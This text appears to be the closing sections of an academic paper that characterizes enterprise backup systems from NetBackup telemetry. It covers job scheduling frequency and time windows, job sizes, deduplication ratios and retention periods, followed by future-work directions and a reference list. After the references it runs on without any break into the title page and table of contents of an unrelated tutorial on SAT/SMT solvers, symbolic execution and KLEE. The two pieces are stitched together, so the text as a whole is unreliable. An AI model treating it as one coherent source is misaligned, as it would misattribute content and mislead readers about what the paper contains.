Figure 9: Distribution of the average scheduling frequency of different job types across backup domains: management operations (mean: 3 days), incremental backups (mean: 2 days), full backups (mean: 5 days), snapshot operations (mean: 5 days), and recovery operations, broken into two groups of domains with 5 or more (mean: 6 days) and fewer than 5 (mean: 24 days) recovery operations each. Despite being of similar size, the characteristics of each group differ significantly.

A factor indicative of data churn in a backup domain is the rate at which jobs are scheduled to back up, restore, or manage backed-up data. To quantify the scheduling frequency of different job types for a given domain, we rely on the starting times of individual jobs. Specifically, starting times are used to estimate the average occurrence rate of different jobs of each domain policy, on individual clients. In Figure 9, we show the distributions of the scheduling frequency of different job types across backup domains. Overall, we find that the average frequency of recovery operations differs depending on their number.
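The frequency estimate described above (average gap between consecutive job start times, per job type) can be sketched as follows; the timestamps are hypothetical stand-ins for the telemetry records.

```python
from datetime import datetime

def avg_frequency_days(start_times):
    """Average scheduling frequency as the mean gap between
    consecutive job start times, in days."""
    times = sorted(start_times)
    gaps = [(b - a).total_seconds() / 86400.0
            for a, b in zip(times, times[1:])]
    return sum(gaps) / len(gaps)

# Hypothetical full-backup start times for one client policy.
starts = [datetime(2015, 3, d, 18, 0) for d in (1, 6, 11, 16, 21)]
print(avg_frequency_days(starts))  # -> 5.0
```

Applying this per policy and per client, then averaging within a domain, yields the per-domain frequencies whose distributions appear in Figure 9.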
In Figure 9, we show the distributions of the recovery frequency for two domain groups, having recovered data more and less than 5 times. The former group consists of 337 domains that recovered data 17 times on average, and the latter consists of 262 domains with 3 recovery operations on average. By definition, our analysis excludes an additional 676 domains that initiate recovery only once. For domains with multiple events, the distribution of their frequency spans 1-2 weeks, with an average of 6 days. On the other hand, domains with fewer recovery operations perform them significantly less frequently, up to 2 months apart and every 24 days on average. Since recovery operations are initiated manually by users, we have no accurate way of pinpointing their cause. These results, however, suggest that frequent recovery operations may be attributed to disaster recovery testing, while infrequent ones may be due to actual disasters. Interestingly, both domain groups are equally small, but when domains with a single recovery event are factored in, the group of infrequent recovery operations doubles in size.

In the case of backup jobs, the general belief is that systems in the field rely on weekly full backups, complemented by daily incremental backups [11, 36, 67]. Our results confirm this assumption for incremental backups, which take place every 1-2 days in 81% of domains. Daily incremental backups are also the default option in NetBackup. For full backups, however, our analysis shows that only 17% of domains perform them every 6-8 days on average. Instead, the majority of domains perform full backups more often: 15% perform them every 1-2 days, and 57% perform them every 2-6 days. This is despite the fact that weekly full backups are the default option. As expected, management operations take place on a daily or weekly basis, since they usually follow (or precede) an incremental or full backup operation. Snapshot operations display a similar trend to full backups, as they are mostly used by clients in lieu of the latter.

Figure 10: Tukey boxplots (without outliers) that represent the average size of full backup jobs, for different job scheduling frequencies. Means for each boxplot are also shown. Frequent full backups seem to be associated with larger job sizes, suggesting that they may be preferred as a response to high data churn.

Of the 65% of domain policies that perform full backups every 6 days or fewer, only 33% also perform incremental backups at all. On the other hand, 76% of policies that perform weekly full backups also rely on incremental backups. To determine whether full backups are performed frequently to accommodate high data churn, we group average full backup sizes per client policy according to their scheduling frequency, and present the results as a series of boxplots in Figure 10. Note that regardless of frequency, full backups tend to be small (medians in the order of a few gigabytes), due to the efficiency of deduplication. However, the larger percentiles of each distribution show that larger backup sizes tend to occur when full backups are taken more frequently than once per week. While this confirms our assumption of high data churn for a fraction of the clients, the remaining small backup sizes could also be attributed to overly conservative configurations, a sign that policy auto-configuration is an important feature for future data protection systems.

5.3 Scheduling windows

Observation 6: Users prefer default scheduling windows during weekdays, resulting in nightly bursts of activity. Default values are overridden, however, to avoid scheduling jobs during the weekend.
Figure 11: Probability density function for scheduling policy jobs at a given hour of a given day of the week. Policies tend to be configured using the default scheduling windows at 6pm and 12am, resulting in high system load during those hours.

Another important factor for characterizing the workload of a backup system is the exact time jobs are scheduled. A popular belief is that backup operations take place late at night or during weekends, when client systems are expected to be idle [15, 66]. In Figure 11, we show our findings for all the jobs in our dataset. The presented density function was computed by normalizing the number of jobs that take place in a given domain, to prevent domains with more jobs from affecting the overall trend disproportionately. We note that this normalization had minimal effect on the result, which suggests that the presented trend is common across domains.

The hourly scheduling frequency is similar for each day, although there is less activity during the weekend. We also find that the probability of a job being scheduled is highest starting at 6pm and 12am on a weekday. We attribute the timing of job scheduling to customers using the default scheduling windows suggested by NetBackup, which start at 6pm and 12am every day. The choice to exclude weekends, however, seems to be an explicit choice of the user. This result suggests that automated job scheduling, where the only constraints would be to leverage device idleness [4, 26, 48], would be more practical, allowing the system to schedule jobs so that such activity bursts are avoided.

While Figure 11 merges all job types, different jobs exhibit different scheduling patterns, as shown in Figure 9.
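The per-domain normalization described above can be sketched as follows: each domain contributes a probability distribution over the 168 hours of the week, and domains are averaged with equal weight so that job-heavy domains do not dominate. The job data is hypothetical.

```python
def hour_of_week_density(domains):
    """Average per-domain hour-of-week distributions, as in Figure 11.
    `domains` maps a domain id to the list of hour-of-week slots
    (0-167, Monday 12am = 0) at which its jobs started."""
    density = [0.0] * 168
    for hours in domains.values():
        for h in hours:
            # Each domain contributes total weight 1/len(domains),
            # split evenly across its own jobs.
            density[h] += 1.0 / len(hours) / len(domains)
    return density  # sums to 1.0 across all 168 slots

# Hypothetical: a busy domain and a small one, both favoring 6pm Monday (slot 18).
domains = {"big": [18] * 90 + [0] * 10, "small": [18, 42]}
d = hour_of_week_density(domains)
print(round(d[18], 2))
```

Without the per-domain normalization, the "big" domain's 100 jobs would swamp the "small" domain's 2; with it, each domain contributes equally to the overall trend.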
Our data, however, does not allow a matching of job types to scheduling times at a granularity finer than the day on which the job was scheduled. Thus, we partition jobs based on their type, and in Figure 12 we show the probability that a job of a given type will be scheduled on a given day of the week. We find that incremental backups are scheduled to complement full backups, as they tend to get scheduled from Monday to Thursday, while full backups are mostly scheduled on Fridays. Note that the latter does not contradict our previous result of full backups that take place more often than once a week, as the probability of scheduling full backups any other day is still comparatively high. Recovery operations also take place within the week, with a slightly higher probability on Tuesdays (which we confirmed as not related to Patch Tuesday [49]). Finally, management operations do not follow any particular trend and are equally likely to be scheduled on any day of the week.

Figure 12: Probability of a policy job occurring on a given day of the week, based on its type. Incremental backups tend to be scheduled to complement full backups, while users initiate recovery operations more frequently at the beginning of the week.

Figure 13: Distribution of the average job size of a given job type across backup domains, after the data has been deduplicated at the client side: management operations (mean: 32.9GB), incremental backups (mean: 34.9GB), full backups (mean: 47.1GB), and recovery operations (mean: 51.8GB). Incremental backups resemble full backups in size.
6 Backup data growth

Characterizing backup data growth is crucial for estimating the amount of data that needs to be transferred and stored, which allows for efficient provisioning of storage capacity and bandwidth. Towards this goal, we analyze the sizes and number of files of different job types, and their deduplication ratios across backup domains. Finally, we look into the time that backup data is retained.

6.1 Job sizes and number of files

Observation 7: Incremental and full backups tend to be similar in size and files transferred, due to the effectiveness of deduplication, or misconfigurations. Recovery jobs restore either a few files, or entire volumes.

Figure 14: Distributions of the average number of files transferred per job, across different job types: management operations (mean: 11,724 files), incremental backups (mean: 52,033 files), full backups (mean: 75,916 files), and recovery operations (mean: 73,223 files). The trends are consistent with those for job sizes (Figure 13).

An obvious factor when estimating a domain's data growth is the size of backup jobs. In Figure 13, we show the distributions of the average number of bytes transferred for different job types across all domains, after the data has been deduplicated at the client. Averages for each operation are shown in the legend, and marked on the x axis. Snapshot operations are not included, as they do not incur data transfer.

Surprisingly, incremental backups resemble full backups in size. Although the distribution of full backups is skewed toward larger job sizes, 29% of full backups on domains that also perform incremental backups tend to be equal or smaller in size than the latter, 21% range from 1-1.5 times the size of incremental backups, and the remainder range from 1.5-10^6 times. We attribute the small size difference to three reasons.
First, systems with low data churn can achieve high deduplication rates, which are common as we show in Section 6.2. Second, misconfigured policies or volumes that do not support incremental backups often fall back to full backups, as suggested by support tickets. Third, maintenance applications, such as anti-virus scanners, can update file metadata, making unchanged files appear modified. Overall, the average backup job sizes in Figure 13 are 5-8 times smaller than the file sizes reported by Wallace et al. [66], likely due to their study considering the sizes of all files in the file system storing the backup images.

Since recovery operations can be triggered by users to recover an entire volume or individual files, the distribution of recovery job sizes is not surprising. 32% of recovery jobs restore less than 1GB, while the average job can be as large as 51GB. Finally, management operations, which consist mostly of metadata backups (95.7%), but also backup image (1.5%) and snapshot (2.8%) duplication operations, are much smaller than all other operations, as expected.

Figure 14 shows the distributions of the average number of files transferred for different job types in each domain. Similar to job sizes, the average number of files transferred per incremental backup is 31% smaller than that for full backups, and both job types are characterized by similar CDF curves. Recovery operations transfer as many files as full backups on average, yet the majority transfer fewer than 200 files. This is in line with our results on recovery job sizes. Given that large recovery jobs also occur less frequently, these results suggest that most recovery operations are not triggered as a disaster response, but rather to recover data lost due to errors, or to test the recoverability of backup images. Management operations, being mostly metadata backups, transfer significantly fewer files than other job types on average.

Figure 15: Distributions of the average daily deduplication ratio of different job types, across backup domains: management operations (mean: 66.8%), incremental backups (mean: 88.1%), and full backups (mean: 89.1%). Incremental and full backups observe high deduplication ratios, while the uniqueness of metadata backups (management operations) makes them harder to deduplicate.

6.2 Deduplication ratios

Observation 8: Deduplication can result in the reduction of backup image sizes by more than 88%, despite average job sizes ranging in the tens of gigabytes.

For clients that use NetBackup's deduplication solution, we analyzed the daily deduplication ratios of jobs, i.e. the percentage by which the number of bytes transferred was reduced due to deduplication. Figure 15 shows the distributions of the average daily deduplication ratio for management operations, full, and incremental backups across backup domains. Recovery and snapshot jobs are not included, as the notion of deduplication does not apply. Since deduplication happens globally across backup images, deduplication ratios for backups tend to increase after the first few iterations of a policy. In general, sustained deduplication ratios as high as 99% are not unusual. Across all domains in our dataset, however, the average daily deduplication ratio is 88-89%, for both full and incremental backups. It is interesting to note that despite such high deduplication ratios, jobs in the order of tens of gigabytes are common (Figure 13), suggesting that even for daily incremental jobs, the actual job sizes are an order of magnitude larger. These results are in agreement with previous work [66], which reports average deduplication ratios of 91%.
Figure 16: Distributions of retention period lengths for different job types: management operations (mean: 16 days), incremental backups (mean: 25 days), full backups (mean: 40 days), and snapshot operations (mean: 37 days). 3% of jobs have infinite retention periods. Incremental backups are typically retained for almost half the time of full backups, the majority of which are retained for months.

Finally, for management operations the average deduplication ratio is 68%. Since only 1.1% of domains that use deduplication enable it for management operations, we do not attach much importance to this result. For the reported domains, however, it can be attributed to the uniqueness of metadata backups, which do not share files with other backup images on the same backup domain and consist of large binary files.

6.3 Data retention

Observation 9: Incremental backups are retained for weeks, while full backups are retained for months, and retention depends on their scheduling frequency.

Another factor characteristic of backup storage growth is the retention time for backup images, which is a configurable policy parameter. Once a backup image expires, the master server deletes it from backup storage. We have analyzed the retention periods assigned to each job in our telemetry reports, and show the distributions of retention period lengths for different job types in Figure 16. Our initial observation is that job retention periods coincide with the values available by default in NetBackup, although users can specify custom periods. These values range from 1 week to 1 year, and correspond to the steps in the CDF shown. Federal laws, such as HIPAA [63] and FoIA [64], require minimum retention periods from a few years up to infinity for certain types of data. In our case, 3% of jobs are either assigned custom retention periods longer than 1 year, or are retained indefinitely.
On the other extreme, only 3% of jobs are assigned custom retention periods shorter than 1 week. Previous work confirms our findings, by reporting similar ages for backup image files [66].

In particular, management operations (metadata backups and backup image duplicates) are mostly retained for 1 week. Incremental backups are mostly retained for 2 weeks, the default option. Full backups and snapshots, on the other hand, are more likely retained for months. Overall, 94% of jobs select a preset retention period from NetBackup's list, and 35% of jobs keep the default suggestion of 2 weeks. This suggests that the actual retention period length is not a crucial policy parameter.

Finally, we find a strong correlation (Pearson's r = 0.53) between the length of retention periods for full backups, and the frequency with which they take place. Specifically, we find that clients taking full backups less frequently retain them for longer periods of time. On the other hand, no such correlation exists for management operations and incremental backups. This is because almost all data resulting from a management operation is retained for 1 week (Figure 16), and almost all incremental backups are performed with a frequency of 1-2 days apart (Figure 9). The correlation of retention period length and frequency of full backup operations, coupled with the preference for default values, may suggest that retention periods are selected as a function of storage capacity, or that they are at least limited by that factor.

7 Insight: next-generation data protection

This section outlines five major directions for future work on data protection systems. In each case, we identify existing literature and describe how our findings encourage future work.

Automated configuration and self-healing.
To alleviate performance and availability problems of data protection systems, existing work uses historical data to perform automated storage capacity planning [9], and data prefetching and network scheduling [25]. Our findings support this line of work. We have shown that backup domains grow in bursts, and client policies are either configured using default values, misconfigured, or not configured at all. As a result, clients are left unprotected, jobs are scheduled in bursts, and users are not warned of imminent problems. To enable automated policy configuration and self-healing data protection systems, further research is necessary.

Deduplication. Our findings confirm the efficiency of deduplication at reducing backup image sizes. We further show that in many systems, incremental backups are replaced by frequent full, deduplicated backups. This is likely due to the adoption of deduplication, which improves on incremental backups by looking for duplicates across all backup data in the domain. To completely replace incremental backups, however, it is necessary to improve on the time required to restore the original data from deduplicated storage, which directly affects recovery times. Currently, this is an area of active research [24, 35, 43, 50].

Efficient storage utilization. Our analysis shows that job retention periods are selected as a function of backup frequency, likely to ensure sufficient backup storage space will be available. Additionally, 31% of domains in our dataset use dedicated backup appliances (PBBAs), a market currently experiencing growth [33]. We believe that storage capacity in these dedicated systems should be utilized fully, and retention periods should be dynamically adjusted to fill it, providing the ability to recover older versions of data. In this direction, related work on stream-processing systems [29] could be adapted to the needs of backup data.

Accident insurance.
Most recovery operations in our dataset appear to be small in both the number of files and bytes they recover, compared to their respective backups. This result suggests that recovery operations are mostly triggered to restore a few files, or to test the integrity of backup images. This motivates us to re-examine the requirement of instant recovery for backup systems as a problem of determining which data is more likely to be recovered, and storing it closer to clients [40, 45].

Content-aware backups. Data protection strategies can generate data at a rate up to 5 times higher than production data growth [1]. This is due to the practice of creating multiple copies and backing up temporary files used for test-and-development or data analytics processes, such as the Shuffle stage of MapReduce tasks [10]. Depending on the storage interface used, it might be more efficient to recompute these datasets rather than restoring them from backup storage. Another challenge for contemporary backup software is detecting data changes since the last backup among PBs of data and billions of files [31]. By augmenting data protection systems to account for data types and modification events, we can potentially reduce the time needed to complete backup and restore operations.

8 Conclusion

We investigated an extensive dataset representing a diverse population of enterprise data protection systems to demonstrate how these systems are configured and evolve over time. Among other results, our analysis showed that these systems are usually configured to protect one type of data, and while their client population growth is steady and bursty, their backup policies don't change. With regards to job scheduling, we find that the popularity of default values can have an adverse effect on the efficiency of the system by creating bursty workloads.
Finally, we showed that full and incremental backups tend to be similar in size and number of files, as a result of efficient deduplication and misconfigurations. We hope that our data and the proposed areas of future research will enable researchers to simulate realistic scenarios for building next-generation data protection systems that are easy to configure and manage.

Acknowledgments

The study would not have been possible without the telemetry data collected by Symantec's NetBackup team, and we thank Liam McNerney and Aaron Christensen for their invaluable assistance in understanding the data. We also thank the four anonymous reviewers and our shepherd, Fred Douglis, for helping us improve our paper significantly. Finally, we would like to thank Petros Efstathopoulos, Fanglu Guo, Vish Janakiraman, Ashwin Kayyoor, CW Hobbs, Bruce Montague, Sanjay Sahwney, and all other members of Symantec's Research Labs for their feedback during the earlier stages of our study.

References

[1] Actifio. Actifio Copy Data Virtualization: How It Works, August 2014.

[2] Agrawal, N., Bolosky, W. J., Douceur, J. R., and Lorch, J. R. A five-year study of file-system metadata. In Proceedings of the 5th USENIX Conference on File and Storage Technologies (2007).

[3] Arcserve. arcserve Unified Data Protection. http://www.arcserve.com, May 2014.

[4] Bachmat, E., and Schindler, J. Analysis of methods for scheduling low priority disk drive tasks. In Proceedings of the 2002 ACM SIGMETRICS International Conference on Measurement and Modeling of Computer Systems (2002).

[5] Bacula Systems. Bacula 7.0.5. http://www.bacula.org, July 2014.

[6] Baker, M., Hartman, J. H., Kupfer, M. D., Shirriff, K., and Ousterhout, J. K. Measurements of a Distributed File System. In Proceedings of the 13th ACM Symposium on Operating Systems Principles (1991).

[7] Bennett, J. M., Bauer, M. A., and Kinchlea, D.
Characteristics of Files in NFS Environments. In Pro- ceedings of the 1991 ACM SIGSMALL/PC Symposium onSmall Systems (1991). [8]B HATTACHARYA , S., M OHAN , C., B RANNON , K. W., NARANG , I., H SIAO , H.-I., AND SUBRAMANIAN , M. Coordinating Backup/Recovery and Data ConsistencyBetween Database and File Systems. In Proceedings of the 2002 ACM SIGMOD International Conference onManagement of Data (2002), SIGMOD. [9]C HAMNESS , M. Capacity Forecasting in a Backup Stor- age Environment. In Proceedings of the 25th Interna- tional Conference on Large Installation System Adminis-tration (2011).[10] C HEN,Y . ,A LSPAUGH , S., AND KATZ, R. Interactive Analytical Processing in Big Data Systems: A Cross- industry Study of MapReduce Workloads. Proc. VLDB Endow. 5, 12 (Aug. 2012), 1802–1813. [11] CHERVENAK , A. L., V ELLANKI , V., AND KURMAS , Z. Protecting File Systems: A Survey Of Backup Tech- niques. In Proceedings of the Joint NASA and IEEE Mass Storage Conference (1998). [12] COMM VAULT SYSTEMS . Get Smart About Big Data: In- tegrated Backup, Archive & Reporting to Solve Big Data Management Problems, July 2013. [13] COMM VAULT SYSTEMS INC. CommVault Sim- pana 10. http://www.commvault.com/simpana- software, April 2014. [14] COMM VAULT SYSTEMS INC. CommVault Simpana: Solutions for Protecting and Managing Business Ap-plications. http://www.commvault.com/solutions/ enterprise-applications, April 2015. [15] DASI LVA, J., G UDMUNDSSON , O., AND MOSS ́E, D. Performance of a Parallel Network Backup Manager, 1992. [16] DASI LVA, J., AND GUTHMUNDSSON , O. The Amanda Network Backup Manager. In Proceedings of the 7th USENIX Conference on System Administration (1993), LISA. [17] DELL INC. Dell NetVault 10.0. http://software. dell.com/products/netvault-backup, May 2014. [18] DIMENSIONAL RESEARCH . The state of IT recov- ery for SMBs. http://axcient.com/state-of-it- recovery-for-smbs, Oct. 2014. [19] DOUCEUR , J. R., AND BOLOSKY , W. J. A Large-scale Study of File-system Contents. 
In Proceedings of the 1999 ACM SIGMETRICS International Conference on Measurement and Modeling of Computer Systems (1999).
[20] DOUGLIS, F., BHARDWAJ, D., QIAN, H., AND SHILANE, P. Content-aware Load Balancing for Distributed Backup. In Proceedings of the 25th International Conference on Large Installation System Administration (2011), LISA.
[21] EMC CORPORATION. EMC NetWorker 8.2. http://www.emc.com/data-protection/networker.htm, July 2014.
[22] EMC CORPORATION. EMC ProtectPoint: Protection Software Enabling Direct Backup from Primary Storage to Protection Storage, 2014.
[23] EMC CORPORATION. EMC NetWorker Application Modules Data Sheet. http://www.emc.com/collateral/software/data-sheet/h2479-networker-app-modules-ds.pdf, January 2015.
[24] FU, M., FENG, D., HUA, Y., HE, X., CHEN, Z., XIA, W., HUANG, F., AND LIU, Q. Accelerating Restore and Garbage Collection in Deduplication-based Backup Systems via Exploiting Historical Information. In Proceedings of the 2014 USENIX Annual Technical Conference (2014).
[25] GIAT, A., PELLEG, D., RAICHSTEIN, E., AND RONEN, A. Using Machine Learning Techniques to Enhance the Performance of an Automatic Backup and Recovery System. In Proceedings of the 3rd Annual Haifa Experimental Systems Conference (2010), SYSTOR.
[26] GOLDING, R., BOSCH, P., STAELIN, C., SULLIVAN, T., AND WILKES, J. Idleness is not sloth. In Proceedings of the USENIX 1995 Technical Conference (1995), TCON'95.
[27] HEWLETT-PACKARD. Rethinking backup and recovery in the modern data center, November 2013.
[28] HEWLETT-PACKARD COMPANY. HP Data Protector 9.0.1. http://www.autonomy.com/products/data-protector, August 2014.
[29] HILDRUM, K., DOUGLIS, F., WOLF, J. L., YU, P. S., FLEISCHER, L., AND KATTA, A. Storage Optimization for Large-scale Distributed Stream-processing Systems. Trans. Storage 3, 4 (Feb.
2008), 5:1–5:28.
[30] HSU, W. W., AND SMITH, A. J. Characteristics of I/O Traffic in Personal Computer and Server Workloads. Tech. rep., EECS Department, University of California, Berkeley, 2002.
[31] HUGHES, D., AND FARROW, R. Backup Strategies for Molecular Dynamics: An Interview with Doug Hughes. USENIX ;login: 36, 2 (Apr. 2011), 25–28.
[32] IBM CORPORATION. IBM Tivoli Storage Manager 7.1. http://www.ibm.com/software/products/en/tivostormana, November 2013.
[33] INTERNATIONAL DATA CORPORATION. Worldwide Purpose-Built Backup Appliance (PBBA) Market Revenue Increases 11.2% in the Third Quarter of 2014, According to IDC. http://www.idc.com/getdoc.jsp?containerId=prUS25351414, December 2014.
[34] IRON MOUNTAIN. Data Backup and Recovery Benchmark Report. http://www.ironmountain.com/Knowledge-Center/Reference-Library/View-by-Document-Type/White-Papers-Briefs/I/Iron-Mountain-Data-Backup-and-Recovery-Benchmark-Report.aspx, 2013.
[35] KACZMARCZYK, M., BARCZYNSKI, M., KILIAN, W., AND DUBNICKI, C. Reducing Impact of Data Fragmentation Caused by In-line Deduplication. In Proceedings of the 5th Annual International Systems and Storage Conference (2012).
[36] KEETON, K., SANTOS, C., BEYER, D., CHASE, J., AND WILKES, J. Designing for Disasters. In Proceedings of the 3rd USENIX Conference on File and Storage Technologies (2004), FAST.
[37] KILLICK, R., AND ECKLEY, I. A. changepoint: An R package for Changepoint Analysis. In Journal of Statistical Software (May 2013).
[38] KOLSTAD, R. A Next Step in Backup and Restore Technology. In Proceedings of the 5th USENIX Conference on System Administration (1991), LISA.
[39] LEUNG, A. W., PASUPATHY, S., GOODSON, G., AND MILLER, E. L. Measurement and Analysis of Large-scale Network File System Workloads. In Proceedings of the USENIX 2008 Annual Technical Conference (2008).
[40] LI, C., SHILANE, P., DOUGLIS, F., SHIM, H., SMALDONE, S., AND WALLACE, G.
Nitro: A Capacity-Optimized SSD Cache for Primary Storage. In Proceedings of the 2014 USENIX Annual Technical Conference (2014), ATC.
[41] LI, M., QIN, C., LEE, P. P. C., AND LI, J. Convergent Dispersal: Toward Storage-Efficient Security in a Cloud-of-Clouds. In Proceedings of the 6th USENIX Workshop on Hot Topics in Storage and File Systems (2014), HotStorage.
[42] LI, Z., GREENAN, K. M., LEUNG, A. W., AND ZADOK, E. Power Consumption in Enterprise-scale Backup Storage Systems. In Proceedings of the 10th USENIX Conference on File and Storage Technologies (2012), FAST.
[43] LILLIBRIDGE, M., ESHGHI, K., AND BHAGWAT, D. Improving Restore Speed for Backup Systems that Use Inline Chunk-Based Deduplication. In Proceedings of the 11th USENIX Conference on File and Storage Technologies (2013), FAST.
[44] LIN, X., LU, G., DOUGLIS, F., SHILANE, P., AND WALLACE, G. Migratory Compression: Coarse-grained Data Reordering to Improve Compressibility. In Proceedings of the 12th USENIX Conference on File and Storage Technologies (2014), FAST.
[45] LIU, J., CHAI, Y., QIN, X., AND XIAO, Y. PLC-cache: Endurable SSD cache for deduplication-based primary storage. In Mass Storage Systems and Technologies (MSST), 2014 30th Symposium on (2014).
[46] MEISTER, D., BRINKMANN, A., AND SÜSS, T. File Recipe Compression in Data Deduplication Systems. In Proceedings of the 11th USENIX Conference on File and Storage Technologies (2013), FAST.
[47] MEYER, D. T., AND BOLOSKY, W. J. A Study of Practical Deduplication. In Proceedings of the 9th USENIX Conference on File and Storage Technologies (2011).
[48] MI, N., RISKA, A., LI, X., SMIRNI, E., AND RIEDEL, E. Restrained utilization of idleness for transparent scheduling of background tasks. In Proceedings of the 11th International Joint Conference on Measurement and Modeling of Computer Systems (2009), SIGMETRICS.
[49] MICROSOFT CORPORATION.
Understanding Windows automatic updating. http://windows.microsoft.com/en-us/windows/understanding-windows-automatic-updating.
[50] NG, C.-H., AND LEE, P. P. C. RevDedup: A Reverse Deduplication Storage System Optimized for Reads to Latest Backups. In Proceedings of the 4th Asia-Pacific Workshop on Systems (2013).
[51] OUSTERHOUT, J. K., DA COSTA, H., HARRISON, D., KUNZE, J. A., KUPFER, M., AND THOMPSON, J. G. A Trace-driven Analysis of the UNIX 4.2 BSD File System. In Proceedings of the 10th ACM Symposium on Operating Systems Principles (1985).
[52] PARK, N., AND LILJA, D. J. Characterizing Datasets for Data Deduplication in Backup Applications. In Proceedings of the IEEE International Symposium on Workload Characterization (2010), IISWC.
[53] QUINLAN, S., AND DORWARD, S. Venti: A New Approach to Archival Data Storage. In Proceedings of the 1st USENIX Conference on File and Storage Technologies (2002), FAST.
[54] ROMIG, S. M. Backup at Ohio State, Take 2. In Proceedings of the 4th USENIX Conference on System Administration (1990), LISA.
[55] ROSELLI, D., LORCH, J. R., AND ANDERSON, T. E. A Comparison of File System Workloads. In Proceedings of the USENIX Annual Technical Conference (2000).
[56] SATYANARAYANAN, M. A Study of File Sizes and Functional Lifetimes. In Proceedings of the 8th ACM Symposium on Operating Systems Principles (1981).
[57] SHIM, H., SHILANE, P., AND HSU, W. Characterization of Incremental Data Changes for Efficient Data Protection. In Proceedings of the 2013 USENIX Annual Technical Conference (2013), ATC.
[58] SMALDONE, S., WALLACE, G., AND HSU, W. Efficiently Storing Virtual Machine Backups. In Proceedings of the 5th USENIX Workshop on Hot Topics in Storage and File Systems (2013), HotStorage.
[59] SYMANTEC CORPORATION. Symantec NetBackup 7.6 Data Sheet: Data Protection. http://www.symantec.com/content/en/us/enterprise/fact_sheets/b-netbackup-ds-21324986.pdf, January 2014.
[60] SYMANTEC CORPORATION. Symantec NetBackup 7.6. http://www.symantec.com/backup-software, March 2015.
[61] SYMANTEC CORPORATION. Symantec NetBackup 7.6.1 Getting Started Guide. https://support.symantec.com/en_US/article.DOC7941.html, February 2015.
[62] TARASOV, V., MUDRANKIT, A., BUIK, W., SHILANE, P., KUENNING, G., AND ZADOK, E. Generating Realistic Datasets for Deduplication Analysis. In Proceedings of the 2012 USENIX Annual Technical Conference (2012), ATC.
[63] U.S. DEPARTMENT OF HEALTH AND HUMAN SERVICES. The Health Insurance Portability and Accountability Act. http://www.hhs.gov/ocr/privacy.
[64] U.S. DEPARTMENT OF JUSTICE. The Freedom of Information Act. http://www.foia.gov.
[65] VANSON BOURNE. Virtualization Data Protection Report 2013 – SMB edition. http://www.dabcc.com/documentlibrary/file/virtualization-data-protection-report-smb-2013.pdf, 2013.
[66] WALLACE, G., DOUGLIS, F., QIAN, H., SHILANE, P., SMALDONE, S., CHAMNESS, M., AND HSU, W. Characteristics of Backup Workloads in Production Systems. In Proceedings of the 10th USENIX Conference on File and Storage Technologies (2012).
[67] ZHU, B., LI, K., AND PATTERSON, H. Avoiding the Disk Bottleneck in the Data Domain Deduplication File System. In Proceedings of the 6th USENIX Conference on File and Storage Technologies (2008).
[68] ZMANDA INC. Amanda 3.3.6. http://amanda.zmanda.com, July 2014.
[69] ZWICKY, E. D. Torture-testing Backup and Archive Programs: Things You Ought to Know But Probably Would Rather Not. In Proceedings of the 5th USENIX Conference on System Administration (1991), LISA.
[70] ZWICKY, E. D. Further Torture: More Testing of Backup and Archive Programs. In Proceedings of the 17th USENIX Conference on System Administration (2003), LISA.

Quick introduction into SAT/SMT solvers and symbolic execution

Dennis Yurichev

December 2015 – May 2017

Contents

1 This is a draft!
2 Thanks
3 Introduction
4 Is it a hype? Yet another fad?
5 SMT-solvers
  5.1 School-level system of equations
  5.2 Another school-level system of equations
  5.3 Connection between SAT and SMT solvers
  5.4 Zebra puzzle (AKA Einstein puzzle)
  5.5 Sudoku puzzle
    5.5.1 The first idea
    5.5.2 The second idea
    5.5.3 Conclusion
    5.5.4 Homework
    5.5.5 Further reading
    5.5.6 Sudoku as a SAT problem
  5.6 Solving Problem Euler 31: "Coin sums"
  5.7 Using Z3 theorem prover to prove equivalence of some weird alternative to XOR operation
    5.7.1 In SMT-LIB form
    5.7.2 Using universal quantifier
    5.7.3 How the expression works
  5.8 Dietz's formula
  5.9 Cracking LCG with Z3
  5.10 Solving pipe puzzle using Z3 SMT-solver
    5.10.1 Generation
    5.10.2 Solving
  5.11 Cracking Minesweeper with Z3 SMT solver
    5.11.1 The method
    5.11.2 The code
  5.12 Recalculating micro-spreadsheet using Z3Py
    5.12.1 Unsat core
    5.12.2 Stress test
    5.12.3 The files

1 Satisfiability modulo theories
2 Boolean satisfiability problem
3 Also Known As
4 Linear congruential generator

6 Program synthesis
  6.1 Synthesis of simple program using Z3 SMT-solver
    6.1.1 Few notes
    6.1.2 The code
  6.2 Rockey dongle: finding unknown algorithm using only input/output pairs
    6.2.1 Conclusion
    6.2.2 The files
    6.2.3 Further work
7 Toy decompiler
  7.1 Introduction
  7.2 Data structure
  7.3 Simple examples
  7.4 Dealing with compiler optimizations
    7.4.1 Division using multiplication
  7.5 Obfuscation/deobfuscation
  7.6 Tests
    7.6.1 Evaluating expressions
    7.6.2 Using Z3 SMT-solver for testing
  7.7 My other implementations of toy decompiler
    7.7.1 Even simpler toy decompiler
  7.8 Difference between toy decompiler and commercial-grade one
  7.9 Further reading
  7.10 The files
8 Symbolic execution
  8.1 Symbolic computation
    8.1.1 Rational data type
  8.2 Symbolic execution
    8.2.1 Swapping two values using XOR
    8.2.2 Change endianness
    8.2.3 Fast Fourier transform
    8.2.4 Cyclic redundancy check
    8.2.5 Linear congruential generator
    8.2.6 Path constraint
    8.2.7 Division by zero
    8.2.8 Merge sort
    8.2.9 Extending Expr class
    8.2.10 Conclusion
  8.3 Further reading
9 KLEE
  9.1 Installation
  9.2 School-level equation
  9.3 Zebra puzzle
  9.4 Sudoku
  9.5 Unit test: HTML/CSS color
  9.6 Unit test: strcmp() function
  9.7 UNIX date/time
  9.8 Inverse function for base64 decoder
  9.9 CRC (Cyclic redundancy check)
    9.9.1 Buffer alteration case #1
    9.9.2 Buffer alteration case #2
    9.9.3 Recovering input data for given CRC32 value of it
    9.9.4 In comparison with other hashing algorithms
  9.10 LZSS decompressor
  9.11 strtodx() from RetroBSD
  9.12 Unit testing: simple expression evaluator (calculator)
  9.13 Regular expressions
  9.14 Exercise
10 (Amateur) cryptography
  10.1 Serious cryptography
    10.1.1 Attempts to break "serious" crypto
  10.2 Amateur cryptography
    10.2.1 Bugs
    10.2.2 XOR ciphers
    10.2.3 Other features
    10.2.4 Examples
  10.3 Case study: simple hash function
    10.3.1 Manual decompiling
    10.3.2 Now let's use the Z3
11 SAT-solvers
  11.1 CNF form
  11.2 Example: 2-bit adder
    11.2.1 MiniSat
    11.2.2 CryptoMiniSat
  11.3 Cracking Minesweeper with SAT solver
    11.3.1 Simple population count function
    11.3.2 Minesweeper
  11.4 Conway's "Game of Life"
    11.4.1 Reversing back state of "Game of Life"
